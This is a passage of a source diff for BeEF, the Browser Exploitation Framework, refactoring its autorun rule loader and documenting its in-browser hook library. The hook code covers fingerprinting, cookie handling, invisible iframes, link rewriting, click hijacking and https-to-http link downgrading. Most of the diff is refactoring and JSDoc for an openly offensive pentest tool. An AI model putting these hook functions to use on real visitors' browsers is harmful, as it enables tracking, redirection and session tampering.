+          exec_delay.each { |delay| return [false, 'execution_delay values must be Integers'] unless delay.integer? }
+
+          return [false, 'execution_order and execution_delay values must be consistent with modules numbers'] unless
+              modules.size == exec_order.size && modules.size == exec_delay.size
+
+          success
+        rescue StandardError => e
+          print_error e.message.to_s
+          print_debug e.backtrace.join("\n").to_s
+          [false, 'Something went wrong.']
        end
      end
    end
--- a/core/main/autorun_engine/rule_loader.rb
+++ b/core/main/autorun_engine/rule_loader.rb
@@ -1,14 +1,12 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Core
    module AutorunEngine
-
      class RuleLoader
-
        include Singleton

        def initialize
@@ -18,78 +16,74 @@ module BeEF

        # this expects parsed JSON as input
        def load(data)
-          begin
+          name = data['name']
+          author = data['author']
+          browser = data['browser'] || 'ALL'
+          browser_version = data['browser_version'] || 'ALL'
+          os = data['os'] || 'ALL'
+          os_version = data['os_version'] || 'ALL'
+          modules = data['modules']
+          exec_order = data['execution_order']
+          exec_delay = data['execution_delay']
+          chain_mode = data['chain_mode']

-            name = data['name']
-            author = data['author']
-            browser = data['browser']||'ALL'
-            browser_version = data['browser_version']||'ALL'
-            os = data['os']||'ALL'
-            os_version = data['os_version']||'ALL'
-            modules = data['modules']
-            exec_order = data['execution_order']
-            exec_delay = data['execution_delay']
-            chain_mode = data['chain_mode']
+          parser_result = BeEF::Core::AutorunEngine::Parser.instance.parse(
+            name, author, browser, browser_version, os, os_version, modules, exec_order, exec_delay, chain_mode
+          )

-            parser_result = BeEF::Core::AutorunEngine::Parser.instance.parse(
-                name,author,browser,browser_version,os,os_version,modules,exec_order,exec_delay,chain_mode)
-
-            if parser_result.length == 1 && parser_result.first
-              print_info "[ARE] Ruleset (#{name}) parsed and stored successfully."
-              if @debug_on
-                print_more "Target Browser: #{browser} (#{browser_version})"
-                print_more "Target OS: #{os} (#{os_version})"
-                print_more "Modules to Trigger:"
-                         modules.each do |mod|
-                            print_more "(*) Name: #{mod['name']}"
-                            print_more "(*) Condition: #{mod['condition']}"
-                            print_more "(*) Code: #{mod['code']}"
-                            print_more "(*) Options:"
-                            mod['options'].each do |key,value|
-                              print_more "\t#{key}: (#{value})"
-                            end
-                         end
-                print_more "Exec order: #{exec_order}"
-                print_more "Exec delay: #{exec_delay}"
+          if parser_result.length == 1 && parser_result.first
+            print_info "[ARE] Ruleset (#{name}) parsed and stored successfully."
+            if @debug_on
+              print_more "Target Browser: #{browser} (#{browser_version})"
+              print_more "Target OS: #{os} (#{os_version})"
+              print_more 'Modules to Trigger:'
+              modules.each do |mod|
+                print_more "(*) Name: #{mod['name']}"
+                print_more "(*) Condition: #{mod['condition']}"
+                print_more "(*) Code: #{mod['code']}"
+                print_more '(*) Options:'
+                mod['options'].each do |key, value|
+                  print_more "\t#{key}: (#{value})"
+                end
              end
-              are_rule = BeEF::Core::Models::Rule.new(
-                  :name => name,
-                  :author => author,
-                  :browser => browser,
-                  :browser_version => browser_version,
-                  :os => os,
-                  :os_version => os_version,
-                  :modules => modules.to_json,
-                  :execution_order => exec_order,
-                  :execution_delay => exec_delay,
-                  :chain_mode => chain_mode)
-              are_rule.save
-              return { 'success' => true, 'rule_id' => are_rule.id}
-            else
-              print_error "[ARE] Ruleset (#{name}): ERROR. " + parser_result.last
-              return { 'success' => false, 'error' => parser_result.last }
+              print_more "Exec order: #{exec_order}"
+              print_more "Exec delay: #{exec_delay}"
            end
-
-          rescue => e
-            err = 'Malformed JSON ruleset.'
-            print_error "[ARE] Ruleset (#{name}): ERROR. #{e} #{e.backtrace}"
-            return { 'success' => false, 'error' => err }
+            are_rule = BeEF::Core::Models::Rule.new(
+              name: name,
+              author: author,
+              browser: browser,
+              browser_version: browser_version,
+              os: os,
+              os_version: os_version,
+              modules: modules.to_json,
+              execution_order: exec_order,
+              execution_delay: exec_delay,
+              chain_mode: chain_mode
+            )
+            are_rule.save
+            { 'success' => true, 'rule_id' => are_rule.id }
+          else
+            print_error "[ARE] Ruleset (#{name}): ERROR. " + parser_result.last
+            { 'success' => false, 'error' => parser_result.last }
          end
+        rescue StandardError => e
+          err = 'Malformed JSON ruleset.'
+          print_error "[ARE] Ruleset (#{name}): ERROR. #{e} #{e.backtrace}"
+          { 'success' => false, 'error' => err }
        end

        def load_file(json_rule_path)
-          begin
-            rule_file = File.open(json_rule_path, 'r:UTF-8', &:read)
-            self.load JSON.parse(rule_file)
-          rescue => e
-            print_error "[ARE] Failed to load ruleset from #{json_rule_path}"
-          end
+          rule_file = File.open(json_rule_path, 'r:UTF-8', &:read)
+          self.load JSON.parse(rule_file)
+        rescue StandardError => e
+          print_error "[ARE] Failed to load ruleset from #{json_rule_path}: #{e.message}"
        end

        def load_directory
          Dir.glob("#{$root_dir}/arerules/enabled/**/*.json") do |rule|
            print_debug "[ARE] Processing rule: #{rule}"
-            self.load_file rule
+            load_file rule
          end
        end
      end
--- a/core/main/client/are.js
+++ b/core/main/client/are.js
@@ -1,16 +1,39 @@
 //
-// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

+/** 
+ * A series of functions that handle statuses, returns a number based on the function called.
+ * @namespace beef.are
+ */
+
 beef.are = {
+  /**
+   * A function for handling a success status
+   * @memberof beef.are
+   * @method status_success 
+   * @return {number} 1
+   */
  status_success: function(){
    return 1;
  },
+  /**
+   * A function for handling an unknown status
+   * @memberof beef.are
+   * @method status_unknown 
+   * @return {number} 0
+   */  
  status_unknown: function(){
    return 0;
  },
+  /**
+   * A function for handling an error status
+   * @memberof beef.are
+   * @method status_error 
+   * @return {number} -1
+   */  
  status_error: function(){
    return -1;
  }
--- a/core/main/client/beef.js
+++ b/core/main/client/beef.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -13,23 +13,24 @@ $j = jQuery.noConflict();

 if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {

+    /**
+     * Register the BeEF JS on the window object.
+     * @namespace {Object} BeefJS 
+     * @property {string} version BeEf Version
+     * @property {boolean} pageIsLoaded This gets set to true during window.onload(). It's a useful hack when messing with document.write().
+     * @property {array} onpopstate An array containing functions to be executed by the window.onpopstate() method.
+     * @property {array} onclose An array containing functions to be executed by the window.onclose() method.
+     * @property {array} commands An array containing functions to be executed by Beef.
+     * @property {array} components An array containing all the BeEF JS components.
+     */
+
    var BeefJS = {
-
+        
        version: '<%= @beef_version %>',
-
-        // This get set to true during window.onload(). It's a useful hack when messing with document.write().
        pageIsLoaded: false,
-
-        // An array containing functions to be executed by the window.onpopstate() method.
        onpopstate: new Array(),
-
-        // An array containing functions to be executed by the window.onclose() method.
        onclose: new Array(),
-
-        // An array containing functions to be executed by Beef.
        commands: new Array(),
-
-        // An array containing all the BeEF JS components.
        components: new Array(),

        /**
@@ -37,8 +38,8 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
         * @param: {string} the debug string to return
         */
        debug: function(msg) {
-            if (!<%= @client_debug %>) return;
-            if (typeof console == "object" && typeof console.log == "function") {
+            isDebug = '<%= @client_debug %>'
+            if (typeof console == "object" && typeof console.log == "function" && isDebug === 'true') {
                var currentdate = new Date();
                var pad = function(n){return ("0" + n).slice(-2);}
                var datetime = currentdate.getFullYear() + "-"
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -1,16 +1,23 @@
 //
-// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

 /**
- * @literal object: beef.browser
- *
 * Basic browser functions.
+ * @namespace beef.browser
 */
 beef.browser = {

+    /**
+     * Returns the protocol.
+     * @example: beef.browser.getProtocol()
+     */
+    getProtocol: function() {
+        return document.location.protocol;
+    },
+
    /**
     * Returns the user agent that the browser is claiming to be.
     * @example: beef.browser.getBrowserReportedName()
@@ -110,7 +117,7 @@ beef.browser = {
     * @example: beef.browser.isIE10()
     */
    isIE10: function () {
-        return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints !== "undefined";
+        return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints !== "undefined";
    },

    /**
@@ -128,7 +135,7 @@ beef.browser = {
     * @example: beef.browser.isEdge()
     */
    isEdge: function () {
-        return !beef.browser.isIE() && !!window.StyleMedia;
+        return !beef.browser.isIE() && !!window.styleMedia && (/Edg\/\d+\.\d/.test(window.navigator.userAgent) || /Edge\/\d+\.\d/.test(window.navigator.userAgent));
    },

    /**
@@ -856,7 +863,7 @@ beef.browser = {
     * @example: beef.browser.isFF89()
     */
    isFF89: function () {
-        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/89./) != null;
+        return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/89./) != null;
    },

    /**
@@ -864,7 +871,7 @@ beef.browser = {
     * @example: beef.browser.isFF90()
     */
    isFF90: function () {
-        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/90./) != null;
+        return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/90./) != null;
    },

    /**
@@ -872,7 +879,7 @@ beef.browser = {
     * @example: beef.browser.isFF91()
     */
    isFF91: function () {
-        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/91./) != null;
+        return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/91./) != null;
    },

    /**
@@ -880,7 +887,7 @@ beef.browser = {
     * @example: beef.browser.isFF92()
     */
    isFF92: function () {
-        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/92./) != null;
+        return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/92./) != null;
    },

    /**
@@ -888,7 +895,7 @@ beef.browser = {
     * @example: beef.browser.isFF93()
     */
    isFF93: function () {
-        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/93./) != null;
+        return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/93./) != null;
    },

    /**
@@ -896,7 +903,7 @@ beef.browser = {
     * @example: beef.browser.isFF94()
     */
    isFF94: function () {
-        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/94./) != null;
+        return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/94./) != null;
    },

    /**
@@ -904,7 +911,7 @@ beef.browser = {
     * @example: beef.browser.isFF95()
     */
    isFF95: function () {
-        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/95./) != null;
+        return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/95./) != null;
    },

    /**
@@ -912,7 +919,7 @@ beef.browser = {
     * @example: beef.browser.isFF96()
     */
    isFF96: function () {
-        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/96./) != null;
+        return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/96./) != null;
    },

    /**
@@ -920,7 +927,7 @@ beef.browser = {
     * @example: beef.browser.isFF97()
     */
    isFF97: function () {
-        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/97./) != null;
+        return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/97./) != null;
    },

    /**
@@ -928,7 +935,7 @@ beef.browser = {
     * @example: beef.browser.isFF98()
     */
    isFF98: function () {
-        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/98./) != null;
+        return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/98./) != null;
    },

    /**
@@ -936,7 +943,7 @@ beef.browser = {
     * @example: beef.browser.isFF99()
     */
    isFF99: function () {
-        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/99./) != null;
+        return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/99./) != null;
    },

    /**
@@ -997,10 +1004,13 @@ beef.browser = {

    /**
     * Returns true if Webkit based
-     *
-     * **** DUPLICATE WARNING **** Changes here may aldo need addressed in /isS\d+/ functions.
     */
+
+
    isWebKitBased: function () {
+        /*
+        * **** DUPLICATE WARNING **** Changes here may aldo need addressed in /isS\d+/ functions.
+        */
        return (!window.opera && !window.chrome
                && window.navigator.userAgent.match(/ Version\/\d/) != null
                && !window.globalStorage
@@ -2493,6 +2503,7 @@ beef.browser = {
    type: function () {

        return {
+            E: this.isEdge(), // Edge any version
            C5: this.isC5(), // Chrome 5
            C6: this.isC6(), // Chrome 6
            C7: this.isC7(), // Chrome 7
@@ -3914,12 +3925,12 @@ beef.browser = {
    getPlugins: function () {

        var results;
-        Array.prototype.unique = function () {
-            var o = {}, i, l = this.length, r = [];
-            for (i = 0; i < l; i += 1) o[this[i]] = this[i];
-            for (i in o) r.push(o[i]);
-            return r;
-        };
+
+        function unique(array) {
+          return $j.grep(array, function(el, index) {
+            return index === $j.inArray(el, array);
+          });
+        }

        // Things lacking navigator.plugins
        if (!navigator.plugins) 
@@ -3938,8 +3949,8 @@ beef.browser = {
                // Sometimes store the version in description (Real, Adobe)
                else results[i] = navigator.plugins[i].name;// + '-desc.' + navigator.plugins[i].description;
            }
-            results = results.unique().toString();
-
+            results = unique(results).toString();
+            
            // All browsers that don't support navigator.plugins
        } else {
            results = new Array();
@@ -4579,17 +4590,19 @@ beef.browser = {
     *  This code is based on research from browserspy.dk
     *
     * @parameter {ENUM: 'PER_DOMAIN', 'GLOBAL'=>default}
-     * @return {Deferred promise} A jQuery deferred object promise, which when resolved passes
+     * @return {Object} A jQuery deferred object promise, which when resolved passes
     *    the number of connections to the callback function as "this"
-     *
-     *    example usage:
-     *        $j.when(getMaxConnections()).done(function(){
-     *            console.debug("Max Connections: " + this);
-     *            });
-     *
     */
-    getMaxConnections: function (scope) {

+
+
+    getMaxConnections: function (scope) {
+        /*
+        *    example usage:
+        *        $j.when(getMaxConnections()).done(function(){
+        *            console.debug("Max Connections: " + this);
+        *            }); 
+        */
        var imagesCount = 30;		// Max number of images to test
        var secondsTimeout = 5;		// Image load timeout threashold
        var testUrl = "";		// The image testing service URL
--- a/core/main/client/browser/cookie.js
+++ b/core/main/client/browser/cookie.js
@@ -1,19 +1,18 @@
 //
-// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

-/*!
- * @literal object: beef.browser.cookie
- * 
+/**
 * Provides fuctions for working with cookies. 
 * Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
 * Original author unknown.
- * 
+ * @namespace beef.browser.cookie
 */
 beef.browser.cookie = {
 	
+		/** @memberof beef.browser.cookie */
 		setCookie: function (name, value, expires, path, domain, secure) 
 		{
 	
@@ -32,7 +31,7 @@ beef.browser.cookie = {
 				( ( domain ) ? ";domain=" + domain : "" ) +
 				( ( secure ) ? ";secure" : "" );
 		},
-
+		/** @memberof beef.browser.cookie */
 		getCookie: function(name) 
 		{
 			var a_all_cookies = document.cookie.split( ';' );
@@ -63,7 +62,7 @@ beef.browser.cookie = {
 				return null;
 			}
 		},
-
+		/** @memberof beef.browser.cookie */
 		deleteCookie: function (name, path, domain) 
 		{
 			if ( this.getCookie(name) ) document.cookie = name + "=" +
@@ -72,7 +71,7 @@ beef.browser.cookie = {
 			";expires=Thu, 01-Jan-1970 00:00:01 GMT";
 		},

-	    /* Never stop the madness dear C. */
+	    /** @memberof beef.browser.cookie */
 		veganLol: function (){
 			var to_hell= '';
 			var min = 17;
@@ -99,7 +98,7 @@ beef.browser.cookie = {
 			}
 			return to_hell;
 		},
-		
+		/** @memberof beef.browser.cookie */
 		hasSessionCookies: function (name){
 			this.setCookie( name, beef.browser.cookie.veganLol(), '', '/', '', '' );

@@ -108,7 +107,7 @@ beef.browser.cookie = {
 			return cookiesEnabled;
 			
 		},
-
+		/** @memberof beef.browser.cookie */
 		hasPersistentCookies: function (name){
 			this.setCookie( name, beef.browser.cookie.veganLol(), 1, '/', '', '' );

--- a/core/main/client/browser/popup.js
+++ b/core/main/client/browser/popup.js
@@ -1,19 +1,17 @@
 //
-// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

-/*!
- * @literal object: beef.browser.popup
- * 
+/**
 * Provides fuctions for working with cookies. 
 * Several functions adopted from http://davidwalsh.name/popup-block-javascript
 * Original author unknown.
- * 
+ * @namespace beef.browser.popup
 */
 beef.browser.popup = {
-	
+		/** @memberof beef.browser.popup */
 		blocker_enabled: function ()
 		{
 			screenParams = beef.hardware.getScreenSize();
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -1,20 +1,19 @@
 //
-// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

-/*!
- * @literal object: beef.dom
- *
+/**
 * Provides functionality to manipulate the DOM.
+ * @namespace beef.dom
 */
 beef.dom = {
 	
 	/**
 	 * Generates a random ID for HTML elements
-	 * @param: {String} prefix: a custom prefix before the random id. defaults to "beef-"
-	 * @return: generated id
+	 * @param {String} prefix a custom prefix before the random id. defaults to "beef-"
+	 * @return {String} generated id
 	 */
 	generateID: function(prefix) {
 		return ((prefix == null) ? 'beef-' : prefix)+Math.floor(Math.random()*99999);
@@ -22,9 +21,9 @@ beef.dom = {
 		
 	/**
 	 * Creates a new element but does not append it to the DOM.
-	 * @param: {String} the name of the element.
-	 * @param: {Literal Object} the attributes of that element.
-	 * @return: the created element.
+	 * @param {String} type the name of the element.
+	 * @param {Array} attributes the attributes of that element.
+	 * @return {Array} the created element.
 	 */
 	createElement: function(type, attributes) {
 		var el = document.createElement(type);
@@ -40,7 +39,7 @@ beef.dom = {
 	
 	/**
 	 * Removes element from the DOM.
-	 * @param: {String or DOM Object} the target element to be removed.
+	 * @param {Object} el the target element to be removed.
 	 */
 	removeElement: function(el) {
 		if (!beef.dom.isDOMElement(el))
@@ -54,8 +53,8 @@ beef.dom = {
 	
 	/**
 	 * Tests if the object is a DOM element.
-	 * @param: {Object} the DOM element.
-	 * @return: true if the object is a DOM element.
+	 * @param {Object} the DOM element.
+	 * @return {boolean} true if the object is a DOM element.
 	 */
 	isDOMElement: function(obj) {
 		return (obj.nodeType) ? true : false;
@@ -63,7 +62,7 @@ beef.dom = {
 	
 	/**
 	 * Creates an invisible iframe on the hook browser's page.
-	 * @return: the iframe.
+	 * @return {array} the iframe.
 	 */
 	createInvisibleIframe: function() {
 		var iframe = this.createElement('iframe', {
@@ -79,10 +78,10 @@ beef.dom = {

 	/**
 	 * Returns the highest current z-index
-	 * @param: {Boolean} whether to return an associative array with the height AND the ID of the element
-	 * @return: {Integer} Highest z-index in the DOM
+	 * @param {Boolean} whether to return an associative array with the height AND the ID of the element
+	 * @return {Integer} Highest z-index in the DOM
 	 * OR
-	 * @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
+	 * @return {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
 	 */
 	getHighestZindex: function(include_id) {
 		var highest = {'height':0, 'elem':''};
@@ -105,11 +104,11 @@ beef.dom = {
     * Create an iFrame element and prepend to document body. URI passed via 'src' property of function's 'params' parameter
     * is assigned to created iframe tag's src attribute resulting in GET request to that URI.
     * example usage in the code: beef.dom.createIframe('fullscreen', {'src':$j(this).attr('href')}, {}, null);
-	 * @param: {String} type: can be 'hidden' or 'fullScreen'. defaults to normal
-	 * @param: {Hash} params: list of params that will be sent in request.
-	 * @param: {Hash} styles: css styling attributes, these are merged with the defaults specified in the type parameter
-	 * @param: {Function} a callback function to fire once the iFrame has loaded
-	 * @return: {Object} the inserted iFrame
+	 * @param {String} type: can be 'hidden' or 'fullScreen'. defaults to normal
+	 * @param {Hash} params: list of params that will be sent in request.
+	 * @param {Hash} styles: css styling attributes, these are merged with the defaults specified in the type parameter
+	 * @param {Function} a callback function to fire once the iFrame has loaded
+	 * @return {Object} the inserted iFrame
     *
 	 */
 	createIframe: function(type, params, styles, onload) {
@@ -150,8 +149,8 @@ beef.dom = {

    /**
     * Load a full screen div that is black, or, transparent
-     * @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
-     * @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
+     * @param {Boolean} vis: whether or not you want the screen dimmer enabled or not
+     * @param {Hash} options: a collection of options to customise how the div is configured, as follows:
     *         opacity:0-100         // Lower number = less grayout higher = more of a blackout
     *           // By default this is 70 
     *         zindex: #             // HTML elements with a higher zindex appear on top of the gray out
@@ -219,9 +218,9 @@ beef.dom = {
 	
 	/**
     * Create a form element with the specified parameters, appending it to the DOM if append == true
-	 * @param: {Hash} params: params to be applied to the form element
-	 * @param: {Boolean} append: automatically append the form to the body
-	 * @return: {Object} a form object
+	 * @param {Hash} params: params to be applied to the form element
+	 * @param {Boolean} append: automatically append the form to the body
+	 * @return {Object} a form object
 	 */
 	createForm: function(params, append) {
 		var form = $j('<form></form>').attr(params);
@@ -239,7 +238,7 @@ beef.dom = {

 	/**
 	 * Get the location of the current page.
-	 * @return: the location.
+	 * @return the location.
 	 */
 	getLocation: function() {
 		return document.location.href;
@@ -247,7 +246,7 @@ beef.dom = {
 	
 	/**
 	 * Get links of the current page.
-	 * @return: array of URLs.
+	 * @return array of URLs.
 	 */
 	getLinks: function() {
 		var linksarray = [];
@@ -260,9 +259,9 @@ beef.dom = {
 	
 	/**
 	 * Rewrites all links matched by selector to url, also rebinds the click method to simply return true
-	 * @param: {String} url: the url to be rewritten
-	 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
-	 * @return: {Number} the amount of links found in the DOM and rewritten.
+	 * @param {String} url: the url to be rewritten
+	 * @param {String} selector: the jquery selector statement to use, defaults to all a tags.
+	 * @return {Number} the amount of links found in the DOM and rewritten.
 	 */
 	rewriteLinks: function(url, selector) {
 		var sel = (selector == null) ? 'a' : selector;
@@ -277,9 +276,9 @@ beef.dom = {
 	/**
 	 * Rewrites all links matched by selector to url, leveraging Bilawal Hameed's hidden click event overwriting.
 	 * http://bilaw.al/2013/03/17/hacking-the-a-tag-in-100-characters.html
-	 * @param: {String} url: the url to be rewritten
-	 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
-	 * @return: {Number} the amount of links found in the DOM and rewritten.
+	 * @param {String} url: the url to be rewritten
+	 * @param {String} selector: the jquery selector statement to use, defaults to all a tags.
+	 * @return {Number} the amount of links found in the DOM and rewritten.
 	 */
 	rewriteLinksClickEvents: function(url, selector) {
 		var sel = (selector == null) ? 'a' : selector;
@@ -293,10 +292,10 @@ beef.dom = {

 	/**
     * Parse all links in the page matched by the selector, replacing old_protocol with new_protocol (ex.:https with http)
-	 * @param: {String} old_protocol: the old link protocol to be rewritten
-	 * @param: {String} new_protocol: the new link protocol to be written
-	 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
